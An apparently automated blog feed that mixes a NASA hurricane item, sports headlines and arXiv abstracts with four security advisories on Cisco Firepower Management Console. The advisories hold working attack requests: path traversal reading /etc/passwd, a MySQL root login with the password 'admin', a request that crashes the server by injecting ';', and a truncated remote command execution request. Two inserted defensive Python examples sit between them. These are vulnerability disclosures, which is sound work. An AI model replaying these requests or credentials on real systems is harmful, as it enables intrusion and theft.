On October 2, 2016 at approximately 4:50 a.m. EST (0950 UTC), NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew. At that time, Matthew had maximum sustained winds of 150 mph making it a strong category 4 hurricane. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2dN4smg
via IFTTT

Wednesday, October 5, 2016

MLB Image: Toronto police tweet picture of fan suspected of throwing beer can at Orioles' Hyun Soo Kim on Tuesday (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Ex-Baltimore P Andrew Miller defends Buck Showalter, says he's one of the best at "running a game" - Crasnick (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Seer: Empowering Software Defined Networking with Data Analytics. (arXiv:1610.01221v1 [cs.NI])

Network complexity is increasing, making network control and orchestration a challenging task. The proliferation of network information and tools for data analytics can provide an important insight into resource provisioning and optimisation. The network knowledge incorporated in software defined networking can facilitate the knowledge driven control, leveraging the network programmability. We present Seer: a flexible, highly configurable data analytics platform for network intelligence based on software defined networking and big data principles. Seer combines a computational engine with a distributed messaging system to provide a scalable, fault tolerant and real-time platform for knowledge extraction. Our first prototype uses Apache Spark for streaming analytics and open network operating system (ONOS) controller to program a network in real-time. The first application we developed aims to predict the mobility pattern of mobile devices inside a smart city environment.



from cs.AI updates on arXiv.org http://ift.tt/2dv71GF
via IFTTT

Find Your Own Way: Weakly-Supervised Segmentation of Path Proposals for Urban Autonomy. (arXiv:1610.01238v1 [cs.RO])

We present a weakly-supervised approach to segmenting proposed drivable paths in images with the goal of autonomous driving in complex urban environments. Using recorded routes from a data collection vehicle, our proposed method generates vast quantities of labelled images containing proposed paths and obstacles without requiring manual annotation, which we then use to train a deep semantic segmentation network. With the trained network we can segment proposed paths and obstacles at run-time using a vehicle equipped with only a monocular camera without relying on explicit modelling of road or lane markings. We evaluate our method on the large-scale KITTI and Oxford RobotCar datasets and demonstrate reliable path proposal and obstacle segmentation in a wide variety of environments under a range of lighting, weather and traffic conditions. We illustrate how the method can generalise to multiple path proposals at intersections and outline plans to incorporate the system into a framework for autonomous urban driving.



from cs.AI updates on arXiv.org http://ift.tt/2dLIhIK
via IFTTT

EPOpt: Learning Robust Neural Network Policies Using Model Ensembles. (arXiv:1610.01283v1 [cs.LG])

Sample complexity and safety are major challenges when learning policies with reinforcement learning for real-world tasks -- especially when the policies are represented using rich function approximators like deep neural networks. Model-based methods where the real-world target domain is approximated using a simulated source domain provide an avenue to tackle the above challenges by augmenting real data with simulated data. However, discrepancies between the simulated source domain and the target domain pose a challenge for simulated training. We introduce the EPOpt algorithm, which uses an ensemble of simulated source domains and a form of adversarial training to learn policies that are robust and generalize to a broad range of possible target domains, including to unmodeled effects. Further, the probability distribution over source domains in the ensemble can be adapted using data from target domain and approximate Bayesian methods, to progressively make it a better approximation. Thus, learning on a model ensemble, along with source domain adaptation, provides the benefit of both robustness and learning/adaptation.



from cs.AI updates on arXiv.org http://ift.tt/2dLIn30
via IFTTT

Soft-margin learning for multiple feature-kernel combinations with Domain Adaptation, for recognition in surveillance face datasets. (arXiv:1610.01374v1 [cs.CV])

Face recognition (FR) is the most preferred mode for biometric-based surveillance, due to its passive nature of detecting subjects, amongst all different types of biometric traits. FR under surveillance scenario does not give satisfactory performance due to low contrast, noise and poor illumination conditions on probes, as compared to the training samples. A state-of-the-art technology, Deep Learning, even fails to perform well in these scenarios. We propose a novel soft-margin based learning method for multiple feature-kernel combinations, followed by feature transformed using Domain Adaptation, which outperforms many recent state-of-the-art techniques, when tested using three real-world surveillance face datasets.



from cs.AI updates on arXiv.org http://ift.tt/2dT6v7Y
via IFTTT

The Predictive Context Tree: Predicting Contexts and Interactions. (arXiv:1610.01381v1 [cs.AI])

With a large proportion of people carrying location-aware smartphones, we have an unprecedented platform from which to understand individuals and predict their future actions. This work builds upon the Context Tree data structure that summarises the historical contexts of individuals from augmented geospatial trajectories, and constructs a predictive model for their likely future contexts. The Predictive Context Tree (PCT) is constructed as a hierarchical classifier, capable of predicting both the future locations that a user will visit and the contexts that a user will be immersed within. The PCT is evaluated over real-world geospatial trajectories, and compared against existing location extraction and prediction techniques, as well as a proposed hybrid approach that uses identified land usage elements in combination with machine learning to predict future interactions. Our results demonstrate that higher predictive accuracies can be achieved using this hybrid approach over traditional extracted location datasets, and the PCT itself matches the performance of the hybrid approach at predicting future interactions, while adding utility in the form of context predictions. Such a prediction system is capable of understanding not only where a user will visit, but also their context, in terms of what they are likely to be doing.



from cs.AI updates on arXiv.org http://ift.tt/2dv6iW3
via IFTTT

Towards semi-episodic learning for robot damage recovery. (arXiv:1610.01407v1 [cs.RO])

The recently introduced Intelligent Trial and Error algorithm (IT&E) enables robots to creatively adapt to damage in a matter of minutes by combining an off-line evolutionary algorithm and an on-line learning algorithm based on Bayesian Optimization. We extend the IT&E algorithm to allow for robots to learn to compensate for damages while executing their task(s). This leads to a semi-episodic learning scheme that increases the robot's lifetime autonomy and adaptivity. Preliminary experiments on a toy simulation and a 6-legged robot locomotion task show promising results.



from cs.AI updates on arXiv.org http://ift.tt/2dLJekg
via IFTTT

Visual Question Answering: Datasets, Algorithms, and Future Challenges. (arXiv:1610.01465v1 [cs.CV])

Visual Question Answering (VQA) is a recent problem in computer vision and natural language processing that has garnered a large amount of interest from the deep learning, computer vision, and natural language processing communities. In VQA, an algorithm needs to answer text-based questions about images. Since the release of the first VQA dataset in 2014, several additional datasets have been released and many algorithms have been proposed. In this review, we critically examine the current state of VQA in terms of problem formulation, existing datasets, evaluation metrics, and algorithms. In particular, we discuss the limitations of current datasets with regard to their ability to properly train and assess VQA algorithms. We then exhaustively review existing algorithms for VQA. Finally, we discuss possible future directions for VQA and image understanding research.



from cs.AI updates on arXiv.org http://ift.tt/2cUI3xg
via IFTTT

$\ell_1$ Regularized Gradient Temporal-Difference Learning. (arXiv:1610.01476v1 [cs.AI])

In this paper, we study the Temporal Difference (TD) learning with linear value function approximation. It is well known that most TD learning algorithms are unstable with linear function approximation and off-policy learning. Recent development of Gradient TD (GTD) algorithms has addressed this problem successfully. However, the success of GTD algorithms requires a set of well chosen features, which are not always available. When the number of features is huge, the GTD algorithms might face the problem of overfitting and being computationally expensive. To cope with this difficulty, regularization techniques, in particular $\ell_1$ regularization, have attracted significant attention in developing TD learning algorithms. The present work combines the GTD algorithms with $\ell_1$ regularization. We propose a family of $\ell_1$ regularized GTD algorithms, which employ the well known soft thresholding operator. We investigate convergence properties of the proposed algorithms, and depict their performance with several numerical experiments.



from cs.AI updates on arXiv.org http://ift.tt/2dT6mBw
via IFTTT

Lifted Message Passing for the Generalized Belief Propagation. (arXiv:1610.01525v1 [cs.AI])

We introduce the lifted Generalized Belief Propagation (GBP) message passing algorithm, for the computation of sum-product queries in Probabilistic Relational Models (e.g. Markov logic network). The algorithm forms a compact region graph and establishes a modified version of message passing, which mimics the GBP behavior in a corresponding ground model. The compact graph is obtained by exploiting a graphical representation of clusters, which reduces cluster symmetry detection to isomorphism tests on small local graphs. The framework is thus capable of handling complex models, while remaining domain-size independent.



from cs.AI updates on arXiv.org http://ift.tt/2dv6ep1
via IFTTT

A Novel Representation of Neural Networks. (arXiv:1610.01549v1 [stat.ML])

Deep Neural Networks (DNNs) have become very popular for prediction in many areas. Their strength is in representation with a high number of parameters that are commonly learned via gradient descent or similar optimization methods. However, the representation is non-standardized, and the gradient calculation methods are often performed using component-based approaches that break parameters down into scalar units, instead of considering the parameters as whole entities. In this work, these problems are addressed. Standard notation is used to represent DNNs in a compact framework. Gradients of DNN loss functions are calculated directly over the inner product space on which the parameters are defined. This framework is general and is applied to two common network types: the Multilayer Perceptron and the Deep Autoencoder.



from cs.AI updates on arXiv.org http://ift.tt/2dT5WuO
via IFTTT

A new algorithm for identity verification based on the analysis of a handwritten dynamic signature. (arXiv:1610.01578v1 [cs.CV])

Identity verification based on authenticity assessment of a handwritten signature is an important issue in biometrics. There are many effective methods for signature verification taking into account dynamics of a signing process. Methods based on partitioning take a very important place among them. In this paper we propose a new approach to signature partitioning. Its most important feature is the possibility of selecting and processing of hybrid partitions in order to increase a precision of the test signature analysis. Partitions are formed by a combination of vertical and horizontal sections of the signature. Vertical sections correspond to the initial, middle, and final time moments of the signing process. In turn, horizontal sections correspond to the signature areas associated with high and low pen velocity and high and low pen pressure on the surface of a graphics tablet. Our previous research on vertical and horizontal sections of the dynamic signature (created independently) led us to develop the algorithm presented in this paper. Selection of sections, among others, allows us to define the stability of the signing process in the partitions, promoting signature areas of greater stability (and vice versa). In the test of the proposed method two databases were used: public MCYT-100 and paid BioSecure.



from cs.AI updates on arXiv.org http://ift.tt/2dv71q9
via IFTTT

Modeling State-Conditional Observation Distribution using Weighted Stereo Samples for Factorial Speech Processing Models. (arXiv:1503.02578v2 [cs.LG] UPDATED)

This paper investigates the effectiveness of factorial speech processing models in noise-robust automatic speech recognition tasks. For this purpose, the paper proposes an idealistic approach for modeling state-conditional observation distribution of factorial models based on weighted stereo samples. This approach is an extension to previous single pass retraining for ideal model compensation which is extended here to support multiple audio sources. Non-stationary noises can be considered as one of these audio sources with multiple states. Experiments of this paper over the set A of the Aurora 2 dataset show that recognition performance can be improved by this consideration. The improvement is significant in low signal to noise energy conditions, up to 4% absolute word recognition accuracy. In addition to the power of the proposed method in accurate representation of state-conditional observation distribution, it has an important advantage over previous methods by providing the opportunity to independently select feature spaces for both source and corrupted features. This opens a new window for seeking better feature spaces appropriate for noisy speech, independent from clean speech features.



from cs.AI updates on arXiv.org http://ift.tt/185Z3y6
via IFTTT

Characteristics of Visual Categorization of Long-Concatenated and Object-Directed Human Actions by a Multiple Spatio-Temporal Scales Recurrent Neural Network Model. (arXiv:1602.01921v2 [cs.CV] UPDATED)

The current paper proposes a novel dynamic neural network model for categorization of complex human action visual patterns. The Multiple Spatio-Temporal Scales Recurrent Neural Network (MSTRNN) adds recurrent connectivity to a prior model, the Multiple Spatio-Temporal Scales Neural Network (MSTNN). By developing adequate recurrent contextual dynamics, the MSTRNN can learn to extract latent spatio-temporal structures from input image sequences more effectively than the MSTNN. Two experiments with the MSTRNN are detailed. The first experiment involves categorizing a set of human movement patterns consisting of sequences of action primitives. The MSTRNN is able to extract long-ranged correlations in video images better than the MSTNN. Time series analysis on neural activation values obtained from the recurrent structure shows that the MSTRNN accumulates extracted spatio-temporal features which discriminate action sequences. The second experiment requires that the model categorize a set of object-directed actions, and demonstrates that the MSTRNN can learn to extract structural relationships between actions and action-directed-objects (ADOs). Analysis of characteristics employed in categorizing both object-directed actions and pantomime actions indicates that the model network develops categorical memories by organizing relational structures between each action and appropriate ADO. Such relational structure may be necessary for categorizing human actions with an adequate ability to generalize.



from cs.AI updates on arXiv.org http://ift.tt/1PJbylV
via IFTTT

Representing Verbs with Rich Contexts: an Evaluation on Verb Similarity. (arXiv:1607.02061v2 [cs.CL] UPDATED)

Several studies on sentence processing suggest that the mental lexicon keeps track of the mutual expectations between words. Current DSMs, however, represent context words as separate features, thereby losing important information for word expectations, such as word interrelations. In this paper, we present a DSM that addresses this issue by defining verb contexts as joint syntactic dependencies. We test our representation in a verb similarity task on two datasets, showing that joint contexts achieve performances comparable to single dependencies or even better. Moreover, they are able to overcome the data sparsity problem of joint feature spaces, in spite of the limited size of our training corpus.



from cs.AI updates on arXiv.org http://ift.tt/29oV0yv
via IFTTT

A Geometric Framework for Convolutional Neural Networks. (arXiv:1608.04374v2 [stat.ML] UPDATED)

In this paper, a geometric framework for neural networks is proposed. This framework uses the inner product space structure underlying the parameter set to perform gradient descent not in a component-based form, but in a coordinate-free manner. Convolutional neural networks are described in this framework in a compact form, with the gradients of standard --- and higher-order --- loss functions calculated for each layer of the network. This approach can be applied to other network structures and provides a basis on which to create new networks.



from cs.AI updates on arXiv.org http://ift.tt/2aVrn7O
via IFTTT

MLB: Blue Jays apologize to Orioles for "embarrassing incident" when fan threw beer at Hyun Soo Kim in wild-card game (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access

KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access

Title: Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access
Advisory ID: KL-001-2016-007
Publication Date: 2016.10.05
Publication URL: http://ift.tt/2dfAwKj

1. Vulnerability Details

     Affected Vendor: Cisco
     Affected Product: Firepower Threat Management Console
     Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
     Platform: Embedded Linux
     CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-94: Improper Control of Generation of Code
     Impact: Arbitrary Code Execution
     Attack vector: HTTP
     CVE-ID: CVE-2016-6433

2. Vulnerability Description

     An authenticated user can run arbitrary system commands as the www user which leads to root.

3. Technical Description

     A valid session and CSRF token is required. The webserver runs as a non-root user which is permitted to sudo commands as root with no password.

     POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
     Host: 1.3.3.7
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
     Connection: close
     Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion

KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion

Title: Cisco Firepower Threat Management Console Local File Inclusion
Advisory ID: KL-001-2016-006
Publication Date: 2016.10.05
Publication URL: http://ift.tt/2dfA7b7

1. Vulnerability Details

     Affected Vendor: Cisco
     Affected Product: Firepower Threat Management Console
     Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
     Platform: Embedded Linux
     CWE Classification: CWE-73: External Control of File Name or Path
     Impact: Information Disclosure
     Attack vector: HTTP
     CVE-ID: CVE-2016-6435

2. Vulnerability Description

     An authenticated user can access arbitrary files on the local system.

3. Technical Description

     Requests that take a file path do not properly filter what files can be requested. The webserver does not run as root, so files such as /etc/shadow are not readable.

     GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1
     Host: 1.3.3.7
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3
     Connection: close

     HTTP/1.1 200 OK
     Date: Fri, 22 Apr 2016 23:58:41 GMT
     Server: Apache
     Content-Disposition: attachment; filename=passwd
     X-Frame-Options: SAMEORIGIN
     Connection: close
     Content-Type: application/octet-stream
     Content-Length: 623

     root:x:0:0:Operator:/root:/bin/sh
     bin:x:1:1:bin:/bin:/sbin/nologin
     daemon:x:2:2:daemon:/sbin:/sbin/nologin
     mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin
     nobody:x:99:99:nobody:/:/sbin/nologin
     sshd:x:33:33:sshd:/:/sbin/nologin
     www:x:67:67:HTTP server:/var/www:/sbin/nologin
     sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin
     snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin
     sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin
     sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin
     admin:x:100:100::/Volume/home/admin:/bin/sh
     casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash

4. Mitigation and Remediation Recommendation

     The vendor has issued a patch for this vulnerability in version 6.1. Vendor acknowledgement available at: http://ift.tt/2dL352o

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

     2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
     2016.06.30 - Cisco acknowledges receipt of vulnerability report.
     2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product.
     2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco.
     2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco.
     2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts.
     2016.09.15 - Cisco confirms remediation is underway and soon to be completed.
     2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05.
     2016.10.05 - Public disclosure.

7. Proof of Concept

     See Technical Description

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r

Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg
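The advisory above says requests that take a file path "do not properly filter what files can be requested". The following is an added example, not code from KoreLogic or Cisco, of the containment check a download handler for a parameter like `files` needs; the function names and the report directory passed as `root` are assumptions, since the page does not show how the appliance resolves the parameter.

```python
"""Added example: containment check for a download parameter such as `files`.

Illustrative only. The report root and all names here are assumptions; the
advisory does not describe the appliance's own handler.
"""
import os
from urllib.parse import parse_qsl, urlsplit


class RejectedPath(ValueError):
    """Raised when a requested name must not be served."""


def resolve_under_root(name: str, root: str) -> str:
    """Return the real path of `name` inside `root`, or raise RejectedPath.

    `name` must already be percent-decoded exactly once (decoding twice would
    turn a harmless literal '%2e%2e' into '..').
    """
    if not name:
        raise RejectedPath("empty name")
    # A NUL byte truncates the string in C-level file APIs, which is what the
    # trailing %00 in the advisory's request relies on.
    if "\x00" in name:
        raise RejectedPath("NUL byte in file name")
    if os.path.isabs(name):
        raise RejectedPath("absolute path")
    root_real = os.path.realpath(root)
    # realpath collapses '..' segments and follows symlinks, so the comparison
    # below is made on the location that would actually be opened.
    candidate = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise RejectedPath("path escapes report directory")
    if candidate == root_real:
        raise RejectedPath("names the directory itself")
    return candidate


def check_request(target: str, root: str, param: str = "files"):
    """Check every occurrence of `param` in a request target.

    Returns a list of (allowed, detail) tuples; detail is the resolved path
    when allowed and the rejection reason otherwise.
    """
    results = []
    # parse_qsl performs the single percent-decoding pass.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key != param:
            continue
        try:
            results.append((True, resolve_under_root(value, root)))
        except RejectedPath as exc:
            results.append((False, str(exc)))
    return results


if __name__ == "__main__":
    import tempfile

    demo_root = tempfile.mkdtemp()  # constructed stand-in for a report directory
    open(os.path.join(demo_root, "weekly.pdf"), "w").close()
    for target in (
        "/events/reports/view.cgi?download=1&files=weekly.pdf",
        # Request target as it appears in the advisory:
        "/events/reports/view.cgi?download=1&files=../../../etc/passwd%00",
    ):
        print(target, "->", check_request(target, demo_root))
```

The same function can be run over logged request targets to flag past attempts, since a rejected value is reported with its reason rather than silently dropped.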

Source: Gmail -> IFTTT-> Blogger
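Added example, not part of the KoreLogic advisory and not Cisco's code: one way a download handler can confine a caller-supplied `files` value to a single directory, exercised with the request target from the Technical Description of KL-001-2016-006 above. The throwaway `reports` directory, its file names and all function names are assumptions made for illustration.

```python
import os
import tempfile
from urllib.parse import parse_qs, urlsplit

# Request target copied from the advisory's Technical Description.
ADVISORY_TARGET = "/events/reports/view.cgi?download=1&files=../../../etc/passwd%00"


class RejectedPath(Exception):
    """The requested name must not be opened."""


def files_param(request_target):
    """Return the percent-decoded `files` value (%00 becomes a real NUL byte)."""
    query = urlsplit(request_target).query
    return parse_qs(query, keep_blank_values=True).get("files", [""])[0]


def naive_resolve(base_dir, name):
    """CWE-73 pattern: join the caller-supplied name onto the base and use it."""
    return os.path.normpath(os.path.join(base_dir, name))


def safe_resolve(base_dir, name):
    """Return a path that is a regular file inside base_dir, or raise."""
    if not name or "\x00" in name:
        raise RejectedPath("empty name or embedded NUL byte")
    if os.path.isabs(name):
        raise RejectedPath("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so the containment test
    # below is made on the file that would really be opened.
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise RejectedPath("resolves outside the report directory")
    if not os.path.isfile(candidate):
        raise RejectedPath("not a regular file")
    return candidate


def verdict(base_dir, name):
    """Human-readable outcome of safe_resolve for one requested name."""
    try:
        return "served " + os.path.basename(safe_resolve(base_dir, name))
    except RejectedPath as exc:
        return "rejected: " + str(exc)


def demo():
    """Build a throwaway report directory (hypothetical layout) and test it."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "reports")
        os.mkdir(base)
        for path in (os.path.join(base, "q3.pdf"), os.path.join(root, "secret.txt")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        # A symlink planted inside the report directory that points outside it.
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(base, "link.pdf"))

        requested = files_param(ADVISORY_TARGET)
        naive = naive_resolve(base, requested.replace("\x00", ""))
        return {
            "naive_escapes_base": not naive.startswith(base + os.sep),
            "advisory_request": verdict(base, requested),
            "traversal_without_nul": verdict(base, "../../../etc/passwd"),
            "symlink_out": verdict(base, "link.pdf"),
            "legitimate": verdict(base, "q3.pdf"),
        }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

The containment check runs on the resolved path, so it also catches a symlink inside the permitted directory, which a filter that only looks for `../` in the raw parameter would miss.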

[FD] KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials

KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials

Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
Advisory ID: KL-001-2016-005
Publication Date: 2016.10.05
Publication URL: http://ift.tt/2dfA8fb

1. Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials
Impact: Authentication Bypass
CVE-ID: CVE-2016-6434

2. Vulnerability Description

The root account for the local MySQL database has poor password complexity.

3. Technical Description

    root@firepower:/Volume/6.0.1# mysql -u root --password=admin
    Warning: Using a password on the command line interface can be insecure.
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 23348
    Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)

    Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql> show databases;

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service

KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service

Title: Cisco Firepower Threat Management Console Authenticated Denial of Service
Advisory ID: KL-001-2016-004
Publication Date: 2016.10.05
Publication URL: http://ift.tt/2dT7Vfg

1. Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-404: Improper Resource Shutdown or Release
Impact: Denial of Service
Attack vector: HTTP

2. Vulnerability Description

An authenticated user can send an HTTP request that will crash the Mojo Server, thereby making future access impossible until a system reboot is performed.

3. Technical Description

The parameter uuid is passed to a chmod function as part of a file path. A ';' in the path causes the function to return an exception.

    POST /pjb.cgi HTTP/1.1
    Host: 1.3.3.7
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    DNT: 1
    Content-Type: application/x-www-form-urlencoded
    Referer: https://1.3.3.7/ddd/
    Content-Length: 1180
    Cookie: x-auto-507=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; x-auto-467=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; CGISESSID=ab588faec87c38a18347787e3b442ff8
    Connection: close

    &function=SF::UI::PJB::Vpn::List::saveVpnDeployment&parameters=%5B%7B%22password%22%3A%22test%22%2C+%22authentication_method%22%3A%22password%22%2C+%22type%22%3A%22PTP%22%2C+%22advanced_setting%22%3A%7B%22ah%22%3A0%2C+%22life_bytes%22%3A%220%22%2C+%22life_time%22%3A1%2C+%22life_time_unit%22%3A%22hours%22%2C+%22life_packets%22%3A%220%22%2C+%22ike_life_time%22%3A3%2C+%22ike_life_time_unit%22%3A%22hours%22%2C+%22ikev2%22%3A1%2C+%22ike_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22modp2048%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22modp2048%22%7D%5D%7D%2C+%22phase2_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22%22%7D%5D%7D%7D%2C+%22status%22%3A0%2C+%22name%22%3A%22test%22%2C+%22uuid%22%3A%2207a0d152-09fc-11e6-93cc-9d074250060f;%22%2C+%22applied%22%3A-1%7D%2C%5B%5D%5D&sf_action_id=a5ba3e29eb18730f7c8dc88d53b48759&ex=1&ss=AllVpnList

As no exception handler is defined, the process exits.
Perl traceback:

    The 'file' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;.lock") to SF::System::chmod did not pass the 'Type Validator (system.file)' callback at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 73
        SF::System::__ANON__('The \'file\' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc...') called at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 640
        SF::System::chmod('HASH(0x114c3c88)') called at /usr/local/sf/lib/perl/5.10.1/SF/Util.pm line 619
        SF::Util::wait_for_lock('/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;....', 120) called at /usr/local/sf/lib/perl/5.10.1/SF/EODataHandler/VPNDeployment.pm line 206
        SF::EODataHandler::VPNDeployment::get_lock('07a0d152-09fc-11e6-93cc-9d074250060f;') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB/Vpn/List.pm line 540
        SF::UI::PJB::Vpn::List::saveVpnDeployment('HASH(0x1154bf38)', 'ARRAY(0x11513750)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 859
        SF::UI::PJB::executeFunction('SF::UI::PJB::Vpn::List::saveVpnDeployment', 'ARRAY(0x11513720)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 821
        SF::UI::PJB::handleRequest('SF::UI::PJB::Vpn::List::saveVpnDeployment', '[{"password":"test", "authentication_method":"password", "typ...') called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 39
        eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 42
        SF::Mojo::Handlers::PjbHandler::handle_pjb_cgi('SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 126
        Mojolicious::__ANON__(undef, 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20
        Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23
        Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_action', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 106
        Mojolicious::Routes::_action('SF::Mojo=HASH(0x905ed38)', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 191
